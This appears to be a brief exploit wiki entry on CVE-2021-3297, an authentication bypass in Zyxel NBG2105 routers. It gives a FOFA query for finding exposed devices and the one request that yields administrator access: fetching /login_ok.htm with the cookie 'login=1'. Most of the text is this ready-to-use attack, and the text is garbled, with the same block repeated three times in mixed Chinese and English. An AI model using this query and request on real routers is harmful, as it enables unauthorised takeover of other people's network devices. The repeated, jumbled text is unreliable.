# CVE-2021-3297 Zyxel NBG2105 身份驗證繞過漏洞/en
Zyxel NBG2105
==FOFA==
app="ZyXEL-NBG2105"

/js/util_gw.js 存在前端對 Cookie login參數的校驗。
home.htm頁面。
http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;

==Vulnerability Impact==
Zyxel NBG2105
==FOFA==
app="ZyXEL-NBG2105"

The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.
home.htm頁面。
http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;

==Vulnerability Impact==
Zyxel NBG2105
==FOFA==
app="ZyXEL-NBG2105"

The front-end file /js/util_gw.js has the front-end verification of the Cookie login parameter.
If you request the following, you will be redirected to the home.htm page as an administrator.
http://xxx.xxx.xxx.xxx/login_ok.htm Cookie: login=1;














请登录后查看评论内容